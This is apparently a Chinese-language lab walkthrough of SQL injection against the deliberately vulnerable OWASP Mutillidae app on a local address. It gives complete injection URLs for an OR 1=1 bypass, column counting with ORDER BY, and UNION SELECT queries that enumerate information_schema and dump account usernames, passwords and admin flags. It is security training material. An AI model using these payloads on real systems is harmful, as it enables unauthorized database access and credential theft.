0,1 都可以SQL injection, level 5则无法SQL injection.
1. 首先尝试security level 0下的注入, security level 1 会有少许不同.
选择SQLi Extract Data -> User Info.
在弹出的页面中随意输入用户名为kobe, password 是user.然后查看结构发现是GET方式输入, (kobe是我以前注册的帐号)
URL 为.
http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe&password=user&user-info-php-submit-button=View+Account+Details
这就是我们要操作的地方了,首先尝试在username这里注入:
username=kobe' or 1=1%23
http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe' or 1=1%23&password=aaa&user-info-php-submit-button=View+Account+Details
就列出了所有的用户名, 密码, signature.
同样的尝试注入password.
http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe&password=aaa' or 1=1%23&user-info-php-submit-button=View+Account+Details
得到的结果一样.
那么这个页面能列出多少列呢?
使用order by 字句.
从order by 1开始,结束于order by 100.然后可以用二分查找order by n 不报错,这个n就是这个页面能列出的列数. 经过尝试,这个页面能列出5个column.
http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe' order by 1%23&password=aaa&user-info-php-submit-button=View+Account+Details
http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe' order by 10%23&password=aaa&user-info-php-submit-button=View+Account+Details
http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe' order by 5%23&password=aaa&user-info-php-submit-button=View+Account+Details
下面使用Union子句查看页面显示的是哪些, 知道我们可以把column 2,3,4修改掉.
点击(此处)折叠或打开
- http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe%27 union select 1,2,3,4,5%23&password=aaa&user-info-php-submit-button=View+Account+Details
Username=kobe
Username=2
Password=abc-123
Signature=test kobe
Password=3
Signature=4
下面查询出数据库的database, user, version.
点击(此处)折叠或打开
- http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe%27 union select 1,database(),user(),version(),5%23&password=aaa&user-info-php-submit-button=View+Account+Details
- #得到下面的信息
- Username=owasp10
- Password=root@localhost
- Signature=5.0.51a-3ubuntu5
点击(此处)折叠或打开
- http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe%27 union select 1,table_name,null,null,5 from information_schema.tables where table_schema='owasp10'%23&password=abc-123&user-info-php-submit-button=View+Account+Details
- #得到下面的表
Username=accounts
Password=
Signature=Username=blogs_table
Password=
Signature=Username=captured_data
Password=
Signature=Username=credit_cards
Password=
Signature=Username=hitlog
Username=pen_test_tools
Password=
Signature=
Password=
Signature=
查accounts 所有的column.
点击(此处)折叠或打开
- http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe%27 union select 1,column_name,null,null,5 from information_schema.columns where table_name='accounts'%23&password=aaa&user-info-php-submit-button=View+Account+Details
- #得到所有的列
Username=cid
Password=
Signature=Username=username
Password=
Signature=Username=password
Password=
Signature=Username=mysignature
Username=is_admin
Password=
Signature=
Password=
Signature=
点击(此处)折叠或打开
- http://192.168.0.105/mutillidae/index.php?page=user-info.php&username=kobe%27 union select 1,username,password,is_admin,5 from accounts%23&password=aaa&user-info-php-submit-button=View+Account+Details